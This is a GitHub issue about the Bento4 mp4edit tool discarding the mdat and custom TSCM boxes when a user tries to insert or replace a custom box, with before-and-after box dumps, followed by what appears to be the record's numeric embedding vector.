This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : It destroys the original structure and does not add custom box Issue date: --- start body --- ``` mp4edit.exe --replace TSCM:1.tscm 1.trec 2.trec mp4edit.exe --insert TSCM:1.tscm 1.trec 2.trec ``` Original file info ``` [ftyp] size=8+16 major_brand = mp42 minor_version = 0 compatible_brand = mp42 compatible_brand = isom [free] size=8+128 [mdat] size=16+8994395 [moov] size=8+2634 [mvhd] size=12+108, version=1 timescale = 1000 duration = 12366 duration(ms) = 12366 [iods] size=12+12 [InitialObjectDescriptor] size=5+7 id = 1 include inline profile level flag = 0 OD profile level = ff scene profile level = ff audio profile level = ff visual profile level = ff graphics profile level = ff [trak] size=8+2482 [tkhd] size=12+92, version=1, flags=1 enabled = 1 id = 1 duration = 12366 width = 2560.000000 height = 1440.000000 [mdia] size=8+2351 [mdhd] size=12+32, version=1 timescale = 30 duration = 371 duration(ms) = 12366 language = und [hdlr] size=12+21 handler_type = vide handler_name = [minf] size=8+2266 [vmhd] size=12+8, flags=1 graphics_mode = 0 op_color = 0000,0000,0000 [dinf] size=8+28 [dref] size=12+16 [url ] size=12+0, flags=1 location = [local to file] [stbl] size=8+2202 [stsd] size=12+134 entry_count = 1 [tsc2] size=8+122 data_reference_index = 1 [stts] size=12+364 entry_count = 45 [stsz] size=12+1376 sample_size = 0 sample_count = 342 [stsc] size=12+124 entry_count = 10 [co64] size=12+108 entry_count = 13 [stss] size=12+24 entry_count = 5 [udta] size=8+11 [name] size=8+3 [free] size=8+128 [TSCR] size=16+64 [TSCM] size=16+13124 ``` new file ``` [ftyp] size=8+16 major_brand = mp42 minor_version = 0 compatible_brand = mp42 compatible_brand = isom [free] size=8+128 [moov] size=8+2634 [mvhd] size=12+108, version=1 timescale = 1000 duration = 12366 duration(ms) = 12366 [iods] size=12+12 [InitialObjectDescriptor] size=5+7 id = 1 include inline profile level flag = 0 OD profile level = ff scene profile level = ff audio profile level = ff visual profile level = ff graphics profile level = ff [trak] size=8+2482 [tkhd] size=12+92, version=1, flags=1 enabled = 1 id = 1 duration = 12366 width = 2560.000000 height = 1440.000000 [mdia] size=8+2351 [mdhd] size=12+32, version=1 timescale = 30 duration = 371 duration(ms) = 12366 language = und [hdlr] size=12+21 handler_type = vide handler_name = [minf] size=8+2266 [vmhd] size=12+8, flags=1 graphics_mode = 0 op_color = 0000,0000,0000 [dinf] size=8+28 [dref] size=12+16 [url ] size=12+0, flags=1 location = [local to file] [stbl] size=8+2202 [stsd] size=12+134 entry_count = 1 [tsc2] size=8+122 data_reference_index = 1 [stts] size=12+364 entry_count = 45 [stsz] size=12+1376 sample_size = 0 sample_count = 342 [stsc] size=12+124 entry_count = 10 [co64] size=12+108 entry_count = 13 [stss] size=12+24 entry_count = 5 [udta] size=8+11 [name] size=8+3 [free] size=8+128 [TSCR] size=16+64 ``` --- end body ---
3,961
[ 0.011719180271029472, 0.025612080469727516, -0.015838220715522766, 0.006143118720501661, 0.013380972668528557, 0.030132785439491272, -0.001990606775507331, 0.017767788842320442, -0.025722341611981392, 0.02732900343835354, 0.026210639625787735, 0.030857358127832413, 0.002195377368479967, 0.009340690448880196, 0.018382102251052856, -0.013239208608865738, -0.009632095694541931, 0.005969851277768612, -0.02904592640697956, -0.011947578750550747, 0.047538287937641144, -0.019705234095454216, 0.012231106869876385, 0.04640417546033859, -0.006934635806828737, 0.013262836262583733, -0.014152800664305687, 0.0075765131041407585, 0.006611728575080633, 0.011695553548634052, -0.00197190186008811, 0.027675537392497063, -0.0011075334623456001, -0.0022386943455785513, 0.03402342647314072, 0.035031527280807495, 0.0636679157614708, 0.05141317844390869, -0.00046147225657477975, 0.03292081505060196, -0.016066618263721466, -0.047443777322769165, -0.008285334333777428, 0.01764177717268467, -0.0005626269849017262, 0.03147166967391968, -0.01609024591743946, -0.00722997821867466, -0.0012955679558217525, 0.031487420201301575, 0.0005936379311606288, -0.02805357612669468, -0.0200045146048069, -0.0450180359184742, -0.004146605264395475, -0.013144698925316334, 0.02304457128047943, 0.00737568037584424, 0.002616732381284237, 0.024761494249105453, -0.013837768696248531, 0.02800632081925869, 0.0015229815617203712, 0.024856003001332283, 0.005820211488753557, -0.027659786865115166, -0.03878040611743927, 0.01148290652781725, -0.020036017522215843, 0.02986500784754753, -0.029297951608896255, -0.027722792699933052, 0.024950513616204262, 0.0166021715849638, 0.026021620258688927, -0.03619714453816414, 0.03402342647314072, 0.006725927349179983, -0.024808749556541443, 0.049302466213703156, -0.04224575683474541, 0.03827635571360588, -0.05768230929970741, 0.010970979928970337, 0.017310993745923042, 0.006907070521265268, -0.043663397431373596, -0.05160219967365265, 0.007017331663519144, -0.012246858328580856, -0.022477515041828156, -0.022603526711463928, 0.07018907368183136, -0.022540520876646042, -0.011514409445226192, 0.041395168751478195, 0.0038000703789293766, -0.0037764429580420256, -0.04441947489976883, -0.05919446423649788, -0.0037882565520703793, -0.008828764781355858, 0.001243390841409564, -0.01836634986102581, 0.022902807220816612, -0.021311895921826363, 0.019657980650663376, -0.006820437032729387, -0.00038099149242043495, 0.10597667843103409, 0.023532871156930923, 0.01261702086776495, -0.0372682549059391, 0.020477062091231346, 0.024304697290062904, -0.021469412371516228, 0.001605677418410778, -0.026478417217731476, -0.007655271328985691, -0.003843387123197317, 0.003008553059771657, 0.015972109511494637, -0.002175687812268734, 0.04700273275375366, -0.027124231681227684, 0.03859138861298561, -0.05601264163851738, -0.014570217579603195, 0.03392891585826874, -0.00550124142318964, -0.06162020564079285, -0.011900323443114758, 0.05305134505033493, -0.016523415222764015, -0.007777345832437277, 0.027265995740890503, -0.02622639201581478, 0.014916752465069294, -0.014585969038307667, 0.02328084595501423, -0.036984726786613464, -0.024840252473950386, 0.024666985496878624, -0.0011862913379445672, -0.036354660987854004, -0.027108481153845787, -0.008348341099917889, 0.03824485093355179, -0.027675537392497063, 0.020697584375739098, -0.022209737449884415, -0.04350588098168373, 0.0010789836524054408, 0.03837086632847786, 0.05254729464650154, 0.020760592073202133, -0.023170584812760353, 0.03151892498135567, -0.018019815906882286, 0.009868369437754154, 0.008332589641213417, -0.03205448016524315, 0.006084050517529249, -0.010671700350940228, -0.011758559383451939, -0.02904592640697956, 0.035441070795059204, 0.008757881820201874, -0.013247084803879261, 0.03232225403189659, -0.011215129867196083, 0.028746645897626877, 0.021878954023122787, 0.024257443845272064, -0.045994631946086884, -0.045396070927381516, 0.011293888092041016, -0.00941157341003418, 0.00407966086640954, -0.01918543316423893, -0.019925756379961967, -0.010348792187869549, 0.020429808646440506, -0.0017316900193691254, -0.0053712911903858185, 0.013396724127233028, 0.01270365435630083, -0.027990570291876793, 0.034937020391225815, -0.02605312503874302, 0.009427324868738651, 0.045490581542253494, 0.021611176431179047, -0.002098898869007826, 0.04920795559883118, 0.0005641037132591009, -0.02873089350759983, -0.03348787501454353, -0.004816047847270966, 0.04306483641266823, 0.018760139122605324, -0.0240999273955822, 0.010018008761107922, -0.03178670257329941, -0.03147166967391968, -0.008939024992287159, -0.04892442747950554, 0.017941057682037354, -0.009238305501639843, -0.020760592073202133, -0.04360039159655571, -0.01891765557229519, 0.030337555333971977, 0.029345205053687096, 0.0007752734236419201, 0.013837768696248531, -0.04186771810054779, 0.0041938601061701775, -0.0368272103369236, 0.002906167646870017, 0.023312348872423172, -0.024619730189442635, 0.016192631796002388, -0.03572459891438484, -0.03396042063832283, 0.013577867299318314, -0.006958263460546732, 0.006139181088656187, 0.010758333839476109, 0.019973011687397957, 0.0450180359184742, 0.03477950394153595, -0.01882314682006836, 0.017657529562711716, 0.007584388833492994, -0.015223908238112926, 0.006607790477573872, -0.019153930246829987, 0.031077880412340164, -0.010065264068543911, 0.0031424416229128838, 0.0577453151345253, -0.026746194809675217, 0.00502475630491972, 0.012829666957259178, 0.07126017659902573, 0.01452296320348978, 0.005639067851006985, -0.021926209330558777, 0.00027392993797548115, 0.034432969987392426, 0.0010671699419617653, 0.005552434362471104, 0.03714223951101303, 0.004508891608566046, 0.01290842518210411, 0.0454590804874897, -0.00863974541425705, -0.02732900343835354, -0.058438386768102646, 0.01438907440751791, 0.009041410870850086, -0.01846086047589779, -0.030888861045241356, 0.00439863046631217, -0.04104863479733467, 0.0064739021472632885, 0.004528581164777279, -0.021563922986388206, 0.020650330930948257, 0.005690260790288448, -0.013932278379797935, -0.0372682549059391, -0.02509227767586708, 0.008962652646005154, -0.026525672525167465, 0.014058290980756283, 0.0027801550459116697, 0.001058309688232839, 0.0007334332331083715, -0.000587731075938791, 0.053807418793439865, 0.02586410567164421, 0.040481578558683395, 0.0006773182540200651, -0.015003385953605175, -0.010214904323220253, 0.0066235424019396305, -0.027392009273171425, -0.017027465626597404, 0.00950608216226101, 0.03868589550256729, -0.020933859050273895, 0.019342947751283646, 0.031077880412340164, -0.02591135911643505, 0.0038847350515425205, 0.01836634986102581, -0.012640648521482944, -0.0027368380688130856, -0.023060323670506477, -0.0014215806731954217, 0.03433845937252045, 0.004540394991636276, -0.058532897382974625, 0.026494169607758522, -0.004107226151973009, 0.030085530132055283, -0.033078331500291824, -0.03018004074692726, 0.0188704002648592, -0.025879856199026108, -0.009789611212909222, 0.019673731178045273, -0.015294790267944336, -0.00246118544600904, 0.010970979928970337, -0.0409226231276989, -0.05654819682240486, 0.02005176991224289, -0.031156638637185097, 0.008214452303946018, -0.03373989835381508, -0.009994382038712502, -0.0005257091834209859, -0.02586410567164421, -0.036984726786613464, 0.026525672525167465, -0.031896963715553284, 0.014743485487997532, -0.012152348645031452, 0.0184136051684618, 0.028132334351539612, -0.02513953298330307, -0.006615666206926107, 0.010372419841587543, -0.00827745907008648, -0.028447365388274193, -0.027612531557679176, -0.012813915498554707, -0.003611051244661212, 0.021579673513770103, 0.01686994917690754, -0.006918884348124266, -0.018523866310715675, -0.004528581164777279, 0.0019502433715388179, 0.014192179776728153, 0.01254613883793354, 0.028604881837964058, 0.0011606949847191572, -0.0322907529771328, -0.013971657492220402, 0.014270937070250511, 0.011632546782493591, -0.010900097899138927, -0.0026108254678547382, -0.0014038601657375693, 0.03613413870334625, -0.009230430237948895, 0.015546816401183605, -0.03082585521042347, 0.02168993465602398, -0.0019403985934332013, -0.007608016487210989, 0.012420126236975193, -0.021154381334781647, 0.046845220029354095, -0.015846095979213715, -0.008041185326874256, 0.007875793613493443, -0.0005370306316763163, -0.038528382778167725, 0.02759677916765213, -0.004256866406649351, -0.04234026372432709, 0.01850811392068863, 0.011797938495874405, -0.004985377192497253, 0.015129398554563522, -0.023611627519130707, 0.0010356667917221785, 0.04029255732893944, -0.0400090292096138, -0.014601720497012138, -0.019059419631958008, -0.03931596130132675, 0.000713251531124115, -0.0340864323079586, -0.016665179282426834, -0.05950949341058731, 0.013971657492220402, -0.0359136164188385, -0.04101713001728058, -0.025706589221954346, 0.04114314541220665, -0.055036045610904694, -0.03947347775101662, 0.006277007050812244, -0.005225589033216238, 0.026982467621564865, -0.02764403447508812, 0.017830796539783478, 0.003057776717469096, 0.0026009806897491217, 0.06823587417602539, -0.0005207868525758386, 0.009710852988064289, 0.00927768461406231, -0.01234136801213026, 0.02736050635576248, 0.024903258308768272, -0.004776668734848499, -0.015783090144395828, 0.02386365458369255, 0.031077880412340164, -0.005320098251104355, 0.008474353700876236, -0.017626024782657623, 0.023658882826566696, 0.009065038524568081, -0.019705234095454216, -0.02537580579519272, 0.011506534181535244, 0.03474799916148186, 0.04542757570743561, -0.02332809939980507, -0.016854196786880493, 0.024021169170737267, -0.021374903619289398, 0.006848002318292856, -0.016649426892399788, -0.024021169170737267, -0.010624445043504238, 0.018602624535560608, -0.011553788557648659, -0.015074267983436584, -0.06741678714752197, -0.022603526711463928, 0.006406957749277353, 0.023832149803638458, 0.04265529662370682, 0.005339787807315588, -0.008411346934735775, 0.020288042724132538, -0.006225814577192068, -0.034306954592466354, -0.05283082276582718, -0.014964007772505283, -0.0068991947919130325, 0.011262384243309498, 0.052389778196811676, 0.00900203175842762, 0.004477388691157103, -0.009474579244852066, -0.007564699277281761, 0.025564825162291527, -0.021311895921826363, 0.050216056406497955, -0.00219340855255723, 0.00008374183380510658, -0.0018606561934575438, 0.02532855048775673, -0.0002859897504094988, 0.026336653158068657, -0.012782412581145763, -0.014680478721857071, -0.011876696720719337, 0.0034574733581393957, -0.0027899998240172863, -0.010325165465474129, 0.007017331663519144, 0.007249667774885893, 0.032889313995838165, -0.008655496872961521, 0.01104973815381527, -0.012585517950356007, -0.03594512119889259, -0.01754726842045784, -0.0504680834710598, -0.0172794908285141, 0.004540394991636276, -0.026903709396719933, -0.00820657704025507, -0.014074042439460754, -0.0040363441221416, -0.026163386180996895, 0.0012256703339517117, -0.006032857578247786, 0.014168552123010159, 0.014396950602531433, 0.012498884461820126, -0.008041185326874256, 0.006217938847839832, 0.01586972363293171, 0.01509002037346363, -0.014932503923773766, -0.011994833126664162, 0.022115226835012436, 0.030211543664336205, 0.008663373067975044, 0.005001128651201725, 0.0020260477904230356, 0.018791642040014267, 0.03670119866728783, -0.034621987491846085, -0.010096766985952854, 0.006466026417911053, -0.006962201092392206, -0.003843387123197317, -0.01177431084215641, -0.011585292406380177, -0.011601043865084648, -0.03613413870334625, -0.05661120265722275, -0.016161127015948296, -0.017342496663331985, 0.009427324868738651, 0.01297930721193552, 0.02509227767586708, 0.0030814041383564472, -0.027722792699933052, -0.033897414803504944, 0.017988311126828194, 0.03632315993309021, -0.014436328783631325, 0.023076074197888374, -0.006938573904335499, 0.01877589151263237, 0.015168777666985989, -0.039977528154850006, 0.0038040082436054945, 0.01800406351685524, 0.015294790267944336, -0.00029780343174934387, -0.013058065436780453, 0.015019137412309647, -0.007879731245338917, -0.038622889667749405, -0.009057162329554558, -0.0020339235197752714, 0.00684012658894062, -0.030904613435268402, 0.00002970343120978214, -0.026950964704155922, 0.014633224345743656, 0.019657980650663376, 0.00415054289624095, -0.0046664075925946236, -0.013601494953036308, 0.004812109749764204, 0.0075765131041407585, 0.0019640258979052305, 0.016806943342089653, 0.0026856455951929092, 0.040670596063137054, 0.008049060590565205, 0.003299957374110818, 0.009317063726484776, -0.009813238866627216, -0.02246176265180111, 0.017988311126828194, 0.01923268660902977, 0.012294113636016846, 0.002748651895672083, -0.0014294565189629793, 0.010112518444657326, -0.0001108764045056887, -0.02145366184413433, -0.02091810666024685, 0.012120845727622509, -0.012223231606185436, 0.014908877201378345, -0.0017346434760838747, -0.001075045787729323, 0.023359602317214012, 0.020744839683175087, -0.0007934861932881176, -0.0059462240897119045, 0.012380747124552727, 0.04760129377245903, -0.023769143968820572, -0.031172389164566994, 0.0015377486124634743, 0.014727733097970486, -0.0075016929768025875, -0.020697584375739098, -0.014507211744785309, -0.004075723234564066, 0.0009790596086531878, 0.0063124485313892365, -0.0033905289601534605, 0.015412927605211735, -0.015357797034084797, 0.026431161910295486, -0.009301312267780304, -0.008710627444088459, 0.010868594981729984, 0.020587323233485222, 0.00006337552622426301, -0.00001870501000666991, 0.052484285086393356, -0.007269357331097126, -0.02513953298330307, -0.04287581890821457, -0.03550407662987709, -0.0036799644585698843, -0.021012617275118828, 0.0011213161051273346, 0.016649426892399788, 0.006595977116376162, -0.009049286134541035, 0.023469863459467888, -0.030904613435268402, 0.009647847153246403, 0.00711577944457531, 0.03714223951101303, 0.015751587226986885, -0.0014550528721883893, -0.014530838467180729, 0.03922145068645477, -0.05075161159038544, 0.05399644002318382, 0.010970979928970337, 0.017704783007502556, 0.023674635216593742, -0.030495071783661842, -0.03849687799811363, -0.010262158699333668, -0.01732674613595009, -0.023469863459467888, 0.015830345451831818, -0.014530838467180729, -0.03355088084936142, -0.033897414803504944, 0.01991000585258007, 0.010797712951898575, -0.024714238941669464, -0.005064134951680899, -0.027486518025398254, 0.011223005130887032, 0.019075172021985054, 0.00047107087448239326, 0.021107126027345657, -0.022241240367293358, 0.00048214622074738145, -0.006418771576136351, -0.03219624236226082, 0.01795680820941925, -0.010466929525136948, -0.040072035044431686, -0.019925756379961967, -0.024288946762681007, 0.008560987189412117, -0.014578093774616718, -0.031849708408117294, 0.018618375062942505, 0.057493291795253754, -0.01872863620519638, -0.009104416705667973, -0.012238983064889908, -0.025895608589053154, 0.012876922264695168, -0.00956908892840147, 0.017988311126828194, -0.013585743494331837, -0.027896059677004814, 0.011640422977507114, -0.018744388595223427, -0.01197908166795969, -0.011451403610408306, -0.015397176146507263, 0.03260578587651253, 0.006253379862755537, -0.003920176066458225, -0.022398756816983223, -0.03348787501454353, 0.016791190952062607, 0.012498884461820126, -0.0340864323079586, 0.017263738438487053, 0.01913817785680294, -0.019799744710326195, 0.028258346021175385, -0.02104412019252777, 0.023217838257551193, -0.019216936081647873, 0.004536456894129515, 0.0057493289932608604, -0.007411121390759945, 0.04945998266339302, 0.002001435961574316, 0.00290419883094728, 0.004697910510003567, -0.013869271613657475, -0.02504502236843109, 0.008112067356705666, -0.0006202187505550683, 0.032983820885419846, -0.006367579102516174, -0.0022111290600150824, -0.009632095694541931, -0.015972109511494637, -0.04372640326619148, -0.007785221561789513, 0.012506759725511074, 0.002167812082916498, 0.004556146450340748, 0.010033761151134968, 0.007426873315125704, 0.0047687930054962635, 0.02969174087047577, 0.01764177717268467, 0.011388396844267845, 0.005765080917626619, 0.006103739608079195, 0.00356379640288651, -0.00017142156139016151, -0.03254277631640434, 0.0037055606953799725, -0.01141202449798584, -0.015271163545548916, 0.0023883343674242496, -0.012428001500666142, 0.00804512295871973, 0.005347663536667824, 0.02728174813091755, 0.029943766072392464, -0.0012256703339517117, 0.007430810946971178, -0.03010128252208233, -0.006143118720501661, 0.007978178560733795, 0.010537811554968357, -0.0468137152493, 0.0030243047513067722, -0.0065762875601649284, -0.04076510667800903, 0.0012168100802227855, -0.00044572068145498633, 0.01154591329395771, 0.031849708408117294, -0.0229658130556345, -0.012073591351509094, -0.003483069594949484, 0.010742582380771637, 0.002829378703609109, -0.00015788504970259964, -0.03742577135562897, 0.012443753890693188, 0.010522060096263885, -0.0027644033543765545, 0.023170584812760353, -0.03082585521042347, -0.00159681704826653, 0.008013620041310787, 0.016208382323384285, 0.015901226550340652, 0.03619714453816414, -0.009962878189980984, -0.011711305007338524, -0.01134114246815443, -0.013514861464500427, -0.0031030625104904175, -0.00018606561934575438, -0.006914946716278791, 0.0184136051684618, -0.012349244207143784, 0.012845419347286224, -0.01964222826063633, 0.012955679558217525, -0.012238983064889908, -0.0028096893802285194, -0.012238983064889908, -0.004406506195664406, -0.02014627866446972, -0.011963330209255219, 0.004067847039550543, 0.0015987860970199108, -0.029471218585968018, -0.017531516030430794, 0.0031581930816173553, -0.07006305456161499, 0.012443753890693188, 0.005465800408273935, 0.008962652646005154, 0.022761043161153793, 0.026761945337057114, -0.02340685762465, 0.0023194211535155773, -0.003477162681519985, -0.01411342155188322, 0.03222774714231491, -0.04687672108411789, -0.016208382323384285, 0.012010584585368633, 0.016523415222764015, -0.011396273039281368, -0.013215580955147743, -0.005761142820119858, -0.01822458580136299, 0.023580124601721764, -0.03837086632847786, -0.03540956601500511, -0.00251237815245986, -0.04249778017401695, -0.006277007050812244, 0.004839675035327673, -0.044576991349458694, 0.005127141252160072, -0.01836634986102581, -0.0015151057159528136, 0.020902356132864952, -0.00712759280577302, 0.005938348360359669, 0.014444204978644848, 0.021170131862163544, -0.019878502935171127, -0.011459278874099255, 0.04719175398349762, 0.00691100861877203, 0.047853320837020874, 0.008403471671044827, -0.032211992889642715, 0.005887155421078205, -0.0247772466391325, 0.003902455559000373, 0.03424394875764847, 0.019216936081647873, -0.0048081716522574425, -0.01577521488070488, -0.0026482355315238237, 0.019169680774211884, 0.009065038524568081, -0.023580124601721764, 0.00016317659174092114, 0.0045167673379182816, -0.016712432727217674, -0.005225589033216238, 0.019484711810946465, -0.043978430330753326, -0.00743474904447794, -0.045081041753292084, -0.03868589550256729, 0.031849708408117294, -0.036575183272361755, -0.005091700237244368, -0.004776668734848499, -0.009891996160149574, -0.022603526711463928, 0.023847902193665504, 0.03194421902298927, -0.02518678642809391, 0.02591135911643505, 0.015137274749577045, -0.019468961283564568, -0.021563922986388206, -0.02496626414358616, 0.01699596270918846, -0.01696445792913437, 0.02627364732325077, 0.029219193384051323, -0.035661593079566956, 0.009553337469696999, 0.008112067356705666, -0.006206125020980835, 0.014578093774616718, -0.007785221561789513, -0.0005606580525636673, -0.022351501509547234, -0.008631869219243526, -0.021170131862163544, -0.0024277132470160723, 0.011577416211366653, -0.018208833411335945, -0.027029722929000854, 0.029360957443714142, -0.010742582380771637, 0.0028648197185248137, 0.0022130978759378195, 0.000011113790606032126, 0.035346560180187225, 0.014089793898165226, 0.006966139189898968, 0.02677769772708416, -0.016539165750145912, 0.020114775747060776, -0.030038274824619293, -0.03164493665099144, -0.01238862331956625, 0.0025773532688617706, 0.008049060590565205, -0.041206151247024536, -0.010490556247532368, 0.02309182658791542, -0.00032463035313412547, -0.015830345451831818, -0.03563008829951286, 0.01305018924176693, -0.04300183057785034, -0.013538489118218422, -0.0019472899148240685, -0.02537580579519272, 0.006434523034840822, -0.031219644472002983, 0.005123203620314598, 0.013199829496443272, 0.01311319600790739, -0.006497529335319996, 0.020288042724132538, 0.02810083143413067, 0.005477614235132933, -0.024351952597498894, -0.005883217789232731, -0.02836860716342926, -0.0036523991730064154, -0.023611627519130707, -0.013577867299318314, -0.004477388691157103, 0.03597662225365639, -0.03109363280236721, 0.006198249291628599, 0.023989666253328323, 0.03733126074075699, -0.014680478721857071, -0.033078331500291824, -0.021343400701880455, 0.005095638334751129, 0.014365446753799915, -0.002325328066945076, 0.00043489146628417075, 0.0009554321877658367, -0.001307381666265428, 0.000949525332543999, 0.025895608589053154, -0.009750232100486755, -0.02569083869457245, 0.012585517950356007, -0.014932503923773766, -0.03301532566547394, 0.004642779938876629, 0.027943314984440804, -0.0206818338483572, -0.029313702136278152, -0.014144924469292164, 0.012845419347286224, 0.002278073225170374, 0.00849798135459423, -0.030573830008506775, -0.024619730189442635, -0.01781504414975643, 0.0015397175448015332, -0.0641089603304863, -0.027833053842186928, -0.01891765557229519, 0.03333035856485367, -0.026210639625787735, 0.0035736411809921265, -0.03673269972205162, 0.01177431084215641, 0.005497303791344166, -0.001752363983541727, 0.00005759174018749036, -0.005847776774317026, 0.013176201842725277, 0.01036454364657402, -0.0166021715849638, 0.03077859990298748, -0.043663397431373596, 0.010655947960913181, -0.008623993955552578, -0.026887958869338036, -0.034811004996299744, 0.0023430485744029284, -0.0006079127779230475, 0.01863412745296955, 0.009884120896458626, -0.020666081458330154, 0.009537586010992527, 0.008702751249074936, -0.024840252473950386, -0.040576085448265076, 0.013215580955147743, -0.011703428812325, 0.03742577135562897, -0.017153477296233177, 0.008560987189412117, 0.01552318874746561, -0.02658867835998535, 0.011853069067001343, 0.00768283661454916, -0.012766661122441292, 0.029250696301460266, -0.04463999718427658, 0.03205448016524315, 0.0044695124961435795, 0.02777004800736904, -0.017657529562711716, -0.0051192655228078365, 0.0022170357406139374, -0.012837543152272701, -0.02118588425219059, 0.0195477195084095, 0.016350146383047104, -0.0010445270454511046, -0.038213349878787994, 0.02736050635576248, 0.0035756102297455072, -0.034937020391225815, 0.03597662225365639, -0.007249667774885893, -0.0027821240946650505, 0.008553111925721169, -0.004048157949000597, -0.047569792717695236, 0.013491233810782433, 0.0034909453243017197, -0.013278587721288204, 0.011553788557648659, 0.04445097595453262, 0.0008436943753622472, -0.01511364709585905, -0.03345637023448944, -0.009340690448880196, 0.019264191389083862, 0.02063457854092121, 0.0016726215835660696, 0.025391558185219765, 0.004611277021467686, 0.019752489402890205, 0.00016453023999929428, 0.01071107853204012, -0.0064739021472632885, 0.020288042724132538, -0.01759452186524868, 0.008064812049269676, 0.01248313207179308, -0.024950513616204262, 0.007084276061505079, -0.0014983697328716516, 0.009419448673725128, 0.009947126731276512, -0.06426647305488586, -0.007848228327929974, -0.00034284312278032303, 0.013987408950924873, 0.006001354660838842, -0.0006108662346377969, 0.020335298031568527, 0.00872637890279293, 0.011719180271029472, 0.00884451624006033, 0.04372640326619148, -0.024792997166514397, 0.001058309688232839, -0.008245955221354961, -0.003794163465499878, -0.010758333839476109, 0.019626477733254433, -0.006426647305488586, -0.019311444833874702, -0.020083272829651833, 0.009222554042935371, -0.052988339215517044, -0.007155158091336489, -0.008907522074878216, -0.0021087436471134424, 0.01923268660902977, 0.0034121875651180744, 0.0012630803976207972, 0.028809651732444763, -0.005091700237244368, -0.038213349878787994, 0.0039044246077537537, 0.008403471671044827, -0.014034663327038288, 0.020240789279341698, -0.016476159915328026, -0.0023725826758891344, -0.0161453764885664, -0.002518284833058715, -0.008718503639101982, 0.025990117341279984, 0.01790955476462841, -0.04678221419453621, 0.0036760265938937664, 0.004126915708184242, -0.003376746317371726, -0.001307381666265428, -0.008198700845241547, -0.011427775956690311, -0.0015151057159528136, 0.01097885612398386, -0.009970754384994507, -0.028258346021175385, 0.030573830008506775, 0.01641315408051014, 0.08310537040233612, 0.029723243787884712, 0.018067069351673126, -0.0009898887947201729, -0.009663598611950874, -0.023879405111074448, 0.00470578670501709, 0.0010445270454511046, -0.0010012101847678423, -0.003091248916462064, 0.02400541864335537, 0.014601720497012138, -0.01750001311302185, 0.0010464960942044854, -0.003114876337349415, 0.002382427453994751, 0.004961750004440546, -0.0029219193384051323, -0.009261933155357838, -0.0025753844529390335, -0.018114324659109116, 0.021154381334781647, 0.03383440896868706, 0.014790739864110947, -0.004126915708184242, -0.00779703538864851, -0.00253403652459383, 0.0015318418154492974, -0.020713336765766144, 0.0211386289447546, -0.019752489402890205, -0.0004422750207595527, -0.0036051443312317133, 0.022698035463690758, 0.006410895846784115, 0.0015741741517558694, 0.011427775956690311, -0.0047176000662148, -0.00012933529797010124, -0.02268228493630886, 0.006434523034840822, 0.0027112418320029974, 0.026667436584830284, -0.010813464410603046, -0.002876633545383811, -0.0017641776939854026, 0.03219624236226082, 0.015491685830056667, -0.0035618275869637728, -0.021894704550504684, 0.011309639550745487, -0.012380747124552727, 0.008915398269891739, 0.031109383329749107, -0.007938799448311329, 0.017389751970767975, 0.002270197495818138, -0.0103409169241786, -0.017200732603669167, -0.03169219195842743, 0.007430810946971178, 0.022808296605944633, 0.02164267934858799, 0.014727733097970486, -0.003136534709483385, -0.015672829002141953, -0.03619714453816414, 0.016397401690483093, -0.0002603934262879193, 0.007308735977858305, 0.013475482352077961, -0.029313702136278152, 0.0077537186443805695, -0.017216484993696213, 0.02096536196768284, 0.04709724336862564, 0.005926534533500671, 0.0011725086951628327, -0.04542757570743561, -0.013869271613657475, 0.036480676382780075, 0.037394266575574875, -0.0008860267698764801, -0.007710401434451342, -0.006091926246881485, 0.01027003489434719, -0.003219230566173792, -0.00005389995931182057, -0.015011262148618698, -0.012089342810213566, -0.0009485408663749695, -0.023422610014677048, 0.005249216221272945, 0.024856003001332283, -0.0016430873656645417, -0.01559407077729702, -0.008686999790370464, -0.0074150594882667065, -0.015783090144395828, -0.011955454014241695, -0.000055468965001637116, -0.004524643067270517, 0.012128721922636032, 0.01745275780558586, -0.008324713446199894, -0.001710031647235155, 0.022383004426956177, -0.0009962879121303558, 0.005611502565443516, 0.006958263460546732, -0.02168993465602398, -0.0011223005130887032, -0.00758045120164752, -0.01991000585258007, -0.019579222425818443, 0.003981213551014662, -0.012073591351509094, -0.010317289270460606, -0.006009230390191078, -0.019468961283564568, -0.01305018924176693, -0.004028468392789364, 0.036480676382780075, -0.008379844017326832, 0.023312348872423172, -0.004835736937820911, -0.011443527415394783, -0.015853971242904663, 0.03474799916148186, 0.016397401690483093, 0.018397852778434753, -0.00047919279313646257, -0.000517341191880405, -0.005556371994316578, 0.027470767498016357, -0.009821114130318165, 0.027927562594413757, -0.015625573694705963, 0.001833090907894075, -0.031077880412340164, 0.006072236690670252, 0.015334169380366802, 0.019295694306492805, 0.023170584812760353, 0.007450500503182411, -0.006981890648603439, -0.015397176146507263, 0.017626024782657623, 0.02709272876381874, 0.03704773262143135, -0.006517218891531229, -0.007560761645436287, 0.001582049997523427, 0.025438811630010605, 0.009301312267780304, -0.004095412325114012, 0.012491008266806602, -0.023391107097268105, 0.011506534181535244, 0.010648072697222233, -0.012215355411171913, 0.017074719071388245, 0.02899867109954357, -0.02022503688931465, -0.014396950602531433, 0.023343851789832115, -0.00927768461406231, -0.07976603507995605, -0.03424394875764847, -0.021752940490841866, -0.018854649737477303, 0.02386365458369255, -0.014278813265264034, -0.034306954592466354, 0.023580124601721764, 0.022540520876646042, -0.022934310138225555, -0.011648298241198063, 0.0017986343009397388, 0.004375003278255463, 0.008482228964567184, 0.010293661616742611, -0.010648072697222233, -0.030384810641407967, 0.04196222499012947, -0.017153477296233177, 0.0026009806897491217, -0.0034062806516885757, -0.01927994191646576, 0.00680862320587039, 0.010388171300292015, 0.02732900343835354, -0.010128269903361797, 0.004040281753987074, -0.018397852778434753, -0.010506308637559414, 0.009986505843698978, -0.013002934865653515, 0.00496568763628602, 0.00798211619257927, 0.00407966086640954, 0.022209737449884415, -0.01595635712146759, 0.015349920839071274, 0.006993704475462437, -0.015452306717634201, -0.016932955011725426, -0.006497529335319996, -0.00492237089201808, -0.009836865589022636, -0.015932729467749596, 0.017893802374601364, 0.0007393400883302093, 0.0027329002041369677, 0.005446110852062702, -0.006150994449853897, -0.0038256666157394648, 0.0040914746932685375, -0.012073591351509094, 0.025517569854855537, -0.001528888358734548, 0.006682610604912043, 0.006938573904335499, 0.010742582380771637, -0.01475136075168848, 0.015838220715522766, 0.03670119866728783, -0.007422935217618942, -0.014648975804448128, 0.0004272617807146162, 0.008828764781355858, -0.005528806708753109, 0.03745727241039276, 0.0013270712224766612, -0.00016994484758470207, 0.002923888387158513, -0.013278587721288204, 0.006702300161123276, 0.02022503688931465, -0.04328535869717598, 